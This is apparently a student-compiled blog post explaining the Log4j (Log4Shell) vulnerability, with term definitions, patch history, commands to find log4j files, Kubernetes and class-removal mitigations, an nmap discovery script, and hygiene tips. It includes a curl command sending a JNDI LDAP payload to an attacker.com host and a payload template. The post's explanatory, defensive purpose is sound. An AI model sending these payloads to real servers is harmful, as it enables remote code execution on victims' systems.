ApacheLog4J Vulnerability and Remediation

(Source:Govcert.ch)
  • Understanding Apache Log4J:
  • Java is a programming language , its object oriented and high level language. Used for developing various apps and games etc.
  • API : (Application programming interface ) it works as an agent for communication and services between two clients
  • JNDI : ( java naming and directory interface) It is an API which used to get names from servers in java based applications.
  • LOG4J: It is a java library which used for logging purpose means for recording everything . It is oldest and very popular .
  • LDAP : (LIGHT WEIGHT DIRECTORY ACCESS PROTOCOL)) It is used to locate things which exact location is not known.
  • RCE: (Remote code execution ) It is ability to run code remotely on compromised machine.
    -Akashdeep (student, ads150213@gmail.com)

Log4j records all type of events-errors, routine system operation and communicates diagnostic messages about
them to administrators and users. A common example for log4j is at the work. When we type or click a bad website or link it redirect us to a 404 error messages but the web server running the domain of the web link tells you that there is no such a website. It records that event in a log for the server’s system administrators using Log4j.

-Sourav (student,sourav200802@gmail.com)

For example, a web application (the target of this vulnerability) typically stores the user agent string,
which identifies the browser used by visitors.

String userAgent = request.getRequestHeader(“User-Agent”);
log.info(userAgent)

Attackers can specify a custom user-agent string for their connections.
This data is saved in a log file, and Log4j is exploited while processing it.

Here is a specially crafted user-agent string to trigger this vulnerability:
curl http://victim.com/ -A “${ jndi:ldap://attacker.com/reference}”

-Sourav Singh (student,souravsingh0500@gmail.com)

Log4j API has 4 main interfaces:

  • LogBuilder: To construct log events before logging them.
  • Logger: Main interface of the log4j package.
  • Class org.apache.logging.log4j.simple.SimpleLogger implements this interface
  • Marker: Adds filterable information to log messages. Markers are hierarchical. For example, “Error” marker can have children “SystemError” and “ApplicationError”.
  • ThreadContext.ContextStack: ThreadContext Stack interface.

FINDING APACHELOG4J IN MACHINE:

Step 1: Run the below commands
• dir C: /s /b | findstr log4j >> clog4j.txt
• dir D: /s /b | findstr log4j >> Dlog4j.txt
• dir E: /s /b | findstr log4j >> Elog4j.txt
• dir F: /s /b | findstr log4j >> Flog4j.txt

Step 2: Then combine all files into a single command
• type clog4j.txt dlog4j.txt elog4j.txt flog4.txt > FullLog4j%COMPUTERNAME%.txt

Step 3: This will give a list of log4j files
in different drivers which can be analyzed further to see what are the jars that needs to be upgraded.
-Shashank Zaveri (student,zaverishashank0@gmail.com)

For containers running Kubernetes:

Administrators can use “kubectl set env” to specify the LOG4J FORMAT MSG NO LOOKUPS=”true” environment setting, which will automatically reflect on all pods and containers, to deploy the mitigation across Kubernetes clusters where Java applications are utilising Log4j 2.10 to 2.14.1.

For versions 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j- core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.

-Srikanth Kondra (student,Srikanth@kensleycollege.ca)

For Discovery:

Run Nmap with –script log4shell.nse script
nmap –script log4shell.nse [–script-args log4shell.callback-server=127.0.0.1:1389] [-p ]

-Manveer Kaur (student, kaur.manvir121998@gmail.com)

Many organizations such as Qualys, Nessus, Datto, Cloud flare which provide cybersecurity and vulnerability management services, indicated that they have added plugins and controls relating to this major vulnerability.

-Monika (student, monikathind36@gmail.com)

Apache released a fix for CVE-2021-44228, version 2.15. However, this patch left a portion of the vulnerability unpatched, leading to CVE-2021-45046 and the release of a second patch, version 2.16.

Apache released a third patch, version 2.17, to address a related vulnerability, CVE-2021-45105. They released a fourth patch, 2.17.1, to address another vulnerability, CVE-2021-44832.

-Adhish Sethi (student,aadish09sethi@gmail.com)

Attackers can take advantage of it by modifying their browser’s user-agent string to ${jndi:ldap://[attacker_URL]} format.

-Simranjeet Kaur (student, simranjeetkaurs1994@gmail.com)

Reference:

-Akter

Log4j version 2.0 to 2.14.1 is affected yet.
-Rishi

Cyber Security Hygiene remediation steps including Log4J:

  1. Follow cyber security best practices: Double check your best practices, especially for any systems or devices directly connected to the internet. Those connections represent the greatest risk beyond your secure perimeter, so minimize the internet exposure of your systems and assets.
  2. Know the products and tools your business uses: If you don’t have an IT expert on staff, check with your product vendors to see how they’re addressing potential vulnerabilities in their tools and products. Find out how they’re responding to this threat and what patching or mitigations might be required.
  3. Check in with your service providers: Your business is only as secure as your supply chain, so find out how your providers are responding. If fraudsters can infiltrate your service provider’s systems, they might also be able to penetrate your systems.
  4. Be vigilant in watching for the warning signs: Tools for threat prevention, detection and response are more critical than ever. You must be able to properly monitor all your systems and quickly identify threats from any mechanism, including zero-day threats like log4j . It’s also important to respond to an attack in real time.
  5. Keep your team informed: When a new vulnerability arises, it’s a great reminder to be proactive with your employees—make them aware of the threat and explain how they can help provide the first line of defense for your business.

-Suhani

Leave a Reply

Your email address will not be published.